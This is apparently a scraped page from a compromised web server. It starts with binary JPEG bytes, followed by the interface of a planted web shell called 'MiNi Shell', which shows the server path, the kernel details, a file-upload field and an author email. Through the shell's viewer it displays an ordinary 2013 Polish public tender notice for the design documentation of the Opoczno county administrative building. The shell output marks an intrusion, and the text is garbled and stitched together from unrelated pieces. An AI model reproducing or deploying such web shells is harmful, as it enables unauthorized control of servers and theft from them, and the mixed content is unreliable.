JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130116/23192-N-2013.html

<p class="kh_header"><b>Opoczno: Wykonanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego dla zadania inwestycyjnego  pn., Rozbudowa i przebudowa istniejącego budynku administracyjnego Starostwa Powiatowego w Opocznie            ul. Kwiatowa 1a, wraz z infrastrukturą techniczną niezbędną do jego prawidłowego funkcjonowania</b><br>
<b>Numer ogłoszenia: 23192 - 2013; data zamieszczenia: 16.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Opoczyński reprezentowany przez Zarząd Powiatu Opoczno , ul. Kwiatowa 1a, 26-300 Opoczno, woj. łódzkie, tel. 044 7361500, faks 044 7361500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opocznopowiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego dla zadania inwestycyjnego  pn., Rozbudowa i przebudowa istniejącego budynku administracyjnego Starostwa Powiatowego w Opocznie            ul. Kwiatowa 1a, wraz z infrastrukturą techniczną niezbędną do jego prawidłowego funkcjonowania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Opracowanie   dokumentacji projektowo - kosztorysowej  oraz sprawowanie nadzoru autorskiego dla planowanej  inwestycji  rozbudowy i  przebudowy  budynku administracyjnego Starostwa Powiatowego
w  Opocznie, ul. Kwiatowa 1a wraz z infrastrukturą techniczną niezbędną do jego prawidłowego funkcjonowania na działkach oznaczonych w ewidencji gruntów numerami  103/1, 184/4, 185/1, 185/3, 1/10 położonych w obrębie 7 miasta Opoczno - wg wstępnej załączonej do SIWZ koncepcji architektonicznej, 
1.1. Inwestor  posiada  prawo  do  dysponowania  terenem  na  cele  budowlane  oraz  prawomocną  decyzję  o  ustaleniu  lokalizacji  inwestycji  celu  publicznego  dla  planowanego  zamierzenia  inwestycyjnego.
2. Przedmiot zamówienia obejmuje również: 
2.1. przeniesienie autorskich praw majątkowych do opracowanej przez Wykonawcę dokumentacji projektowej i zawartych w niej rozwiązań na Zamawiającego;
2.2.   sprawowanie nadzoru autorskiego 
3.  Zakres  rzeczowy  opracowania  dokumentacji:
3.1.  Dokumentacja  geotechniczna  gruntu,
3.2.  Opracowanie  mapy  do  celów  projektowych,
3.3.  Inwentaryzacja  istniejącego budynku administracyjnego  wraz  z  ekspertyzą  techniczną  pod  kątem  możliwości  jego  przebudowy,
3.4.  Weryfikacja załączonego projektu koncepcji architektonicznej będącego podstawą opracowania dokumentacji pod kątem wniesienia do niego uwag Zamawiającego do zastosowanych rozwiązań funkcjonalnych usytuowania pomieszczeń  polegających na:
A. część istniejąca budynku
zaniechanie  przebudowy wejścia głównego,
częściowa zmiana  koncepcji przebudowy pomieszczeń Wydziału Komunikacji  w poziomie parteru,
częściowa zmiana koncepcji przebudowy pomieszczeń (pokój Starosty, Wicestarosty, sekretariat) w poziomie II piętra.
Uwaga:  przedmiar robót  na  zakres  robót  przebudowy  części  istniejącej  budynku  winien uwzględniać  również : 
częściową  wymianę  stolarki  okiennej  zgodnie  ze  wskazaniem  Zamawiającego,
wymianę  pokrycia na  całości  dachu,
renowację  ścian  elewacji  budynku.  
B. część  rozbudowy budynku
zmniejszenie powierzchni zabudowy w części rozbudowy budynku poprzez zaniechanie wykonywania skrzydła budynku od strony wschodniej,
wniesienie dodatkowej kondygnacji II piętra w części rozbudowy budynku od strony północnej oraz częściowo zachodniej,
zmiana koncepcji technologii  sali  konferencyjnej na poziomie II piętra  części  rozbudowy budynku w skrzydle zachodnim (zmiana lokalizacji zaplecza  sanitarno- kuchennego  oraz  szatni,  korytarz komunikacyjny tylko  od  strony  zachodniej) 
zmiana  lokalizacji - przeniesienie pomieszczeń  Wydziału  Administracji Arch.-Bud.  z zaniechanej części  rozbudowy poziomu I piętra na poziom II piętra od strony północnej,
weryfikacja  usytuowania  pomieszczeń  Wydziału  Geodezji  w  poziomie  parteru  i  I piętra,
częściowa  weryfikacja  usytuowania  pomieszczeń  Wydziału Oświaty oraz Ochrony Środowiska i Zdrowia,
zaniechanie  pomieszczeń  sekretariatów zlokalizowanych  przy pokojach Dyrektorów Wydziałów,
zaniechanie budowy  2-ch szybów  windowych,
Uwaga:  
W przypadku stwierdzenia w koncepcji architektonicznej błędnych rozwiązań projektowych w zakresie bezpieczeństwa jak i funkcjonalności projektowanego obiektu w części rozbudowy, Wykonawca dokumentacji jest zobligowany do zastosowania poprawnych rozwiązań. 
Po wniesieniu zmian do projektu koncepcji architektonicznej,  Wykonawca winien uzyskać pozytywną opinię Zamawiającego przed przystąpieniem do sporządzenia projektów budowlanych i wykonawczych. 
3.5. Projekty budowlane i wykonawcze   z   przedmiarami   robót   oraz   specyfikacjami  technicznymi  wykonania  i  odbioru  robót  oraz  kosztorysami  (inwestorskimi  i  nakładczymi) w zakresie:
zagospodarowania  terenu  inwestycji wraz z elementami rekreacji oraz terenów zieleni                          / obejmujące działki o nr inwest. 103/1, 184/4, 185/1, 185/3, 1/10/.
architektury - rozbudowy  i  przebudowy  budynku  administracyjnego.
konstrukcji - rozbudowy  i  przebudowy  budynku  administracyjnego.
wewnętrznych instalacji w branży sanitarnej /wod-kan, c.o. klimatyzacji, wentylacji mechanicznej/ rozbudowy i przebudowy budynku administracyjnego. 
wewnętrznych instalacji w branży elektrycznej /zasilania, oświetlenia, ppoż, alarmowej oraz teleinformatycznej/ rozbudowy i przebudowy budynku administracyjnego.  
zewnętrznych sieci  infrastruktury  technicznej /instalacja wodociągowa, kanalizacja sanitarna, kanalizacja deszczowa/.
Wewnętrznych dróg komunikacyjnych  wraz  miejscami  postojowymi  oraz  chodnikami  dla  pieszych.
oświetlenia  zewnętrznego terenu.
Uwaga:
Projekty budowlane w zakresie niezbędnym dla uzyskania pozwolenia na budowę muszą  zawierać wszystkie niezbędne uzgodnienia, decyzje i opinie zgodnie z wymogami Prawa budowlanego.
3.6. Projekty  budowlane i  wykonawcze  wszystkich  branż  z  przedmiarami  robót  powinny  być  wykonane  w  5  egz.,  kosztorys  inwestorski  w  1 egz.,  kosztorysy  nakładcze, przedmiar robót  oraz   specyfikacje  techniczne  wykonania  i  odbioru  robót  w  3  egz.  
Ponad to  całość  dokumentacji  projektowo -  kosztorysowej  musi  być  również  zapisana  na  nośniku  elektronicznym  w  formacie  PDF..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.00.00-6, 71.22.10.00-3, 71.24.00.00-4, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 210.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości 6.000,00 zł brutto.
2.	Wadium musi być wniesione przed upływem terminu składania ofert w następujących formach, w zależności od wyboru Wykonawcy:
a) pieniądzu, przelewem na rachunek bankowy: Bank Spółdzielczy Ziemi Piotrkowskiej Oddział w Paradyżu Filia w Opocznie  Nr  94 8973 0003 0020 0376 2910 0021
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Za termin wniesienia wadium w pieniądzu uznaje się termin wpłynięcia na rachunek Zamawiającego.
3.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone w oryginale, i musi obejmować cały okres związania ofertą. 
4. Wykonawca, który nie wniesie wadium w wysokości określonej w pkt. 1, w formie lub formach , o których mowa w pkt. 2 zostanie wykluczony z postępowania.
5.  Zamawiający zwraca wadium wszystkim Wykonawcom  niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnienia postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana z zastrzeżeniem pkt. 10
6. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
7. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt. 5, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
9. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11. Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy: 
a)	odmówi podpisania umowy w sprawie niniejszego zamówienia na warunkach określonych w ofercie
b)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana zgodnie z formułą spełnia / nie spełnia wymagany warunek w oparciu 
o informacje zawarte w wymaganych dokumentach i oświadczeniach, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że zrealizował w okresie ostatnich 3 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej 2 zadania odpowiadające swoim rodzajem przedmiotowi niniejszego postępowania i o wartości nie mniejszej niż  200 000,00  PLN brutto każde
Za zamówienie odpowiadające swoim rodzajem stanowiącym przedmiot zamówienia uznaje się opracowanie pełnej dokumentacji projektowo  - kosztorysowej budowy, rozbudowy, przebudowy budynku użyteczności publicznej o powierzchni użytkowej nie mniej 3000 m2. Za budynek użyteczności publicznej Zamawiający uznaje obiekt opisany w § 3 pkt.6 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie /Dz. U. z 2002 r. Nr 75, poz. 690 z póź. zm./.
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana zgodnie z formułą spełnia / nie spełnia wymagany warunek w oparciu 
o informacje zawarte w wymaganych dokumentach i oświadczeniach, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana zgodnie z formułą spełnia / nie spełnia wymagany warunek w oparciu 
o informacje zawarte w wymaganych dokumentach i oświadczeniach, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że będzie dysponował w okresie przewidzianym na realizację zamówienia osobami zdolnymi do wykonania zamówienia, posiadającymi kwalifikacje zawodowe, a w szczególności osobami posiadającymi uprawnienia w rozumieniu ustawy Prawo Budowlane z dnia 07.07.1994 r. / tekst jednolity: Dz. U. z 2010 r., Nr 243, poz. 1623 z póź. zm./ oraz ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów /Dz. U. z 2001 r., Nr 5, poz. 42 z póź. zm./ do projektowania bez ograniczeń w specjalnościach:
a) architektonicznej,
b) konstrukcyjno - budowlanej,
c) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wentylacyjnych, wodociągowych i kanalizacyjnych,
d) instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
e) drogowej,
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana zgodnie z formułą spełnia / nie spełnia wymagany warunek w oparciu 
o informacje zawarte w wymaganych dokumentach i oświadczeniach, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana zgodnie z formułą spełnia / nie spełnia wymagany warunek w oparciu 
o informacje zawarte w wymaganych dokumentach i oświadczeniach, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Druk oferty - wg załącznika Nr 1 do SIWZ,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Na podstawie art. 144 ust.1 ustawy Pzp Zamawiający dopuszcza zmiany postanowień w zawartej umowie w stosunku do treści oferty w następujących przypadkach:
1)	nie można dotrzymać terminu wykonania zamówienia na skutek okoliczności, których nie można było przewidzieć pomimo zachowania należytej staranności,
2)	zmiany przepisów prawa, które mają wpływ na wykonanie dokumentacji projektowo - kosztorysowej,
3)	nastąpiło wydłużenie procedur administracyjnych niezależnych od Wykonawcy, które mają wpływ na termin wykonania zamówienia,
4)	nastąpiła zmiana podatku VAT.
2. Warunkiem dokonania zmian, o których mowa w ust. 1, jest złożenie pisemnego wniosku przez stronę inicjującą zmianę, zawierającego:
1)	opis zmiany,
2)	uzasadnienie zmiany.
3. Zmiana postanowień umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.opocznopowiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Opocznie, ul. Kwiatowa 1a
26-300 Opoczno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2013 godzina 12:30, miejsce: Starostwo Powiatowe w Opocznie, ul. Kwiatowa 1a
26-300 Opoczno - biuro podawcze lub za pośrednictwem poczty.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com